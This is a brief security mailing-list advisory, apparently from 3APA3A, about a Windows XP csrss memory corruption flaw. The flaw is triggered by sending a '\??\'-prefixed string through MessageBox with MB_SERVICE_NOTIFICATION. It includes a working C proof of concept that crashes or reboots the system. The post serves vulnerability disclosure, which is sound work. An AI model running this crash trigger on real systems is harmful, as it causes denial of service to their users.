Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear [email protected],

On one of Russian forum security vulnerability is discussed in
Microsoft Windows (Windows XP is tested). A vulnerability is caused by
memory corruption is string beginning with "\?\" is send thorugh
MessageBox API with MB_SERVICE_NOTIFICATION flag. It looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level. Code example below:

#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots.

–
http://www.security.nnov.ru
/\_/\
{ , . } |\
±-oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
±------------o66o–+ /
|/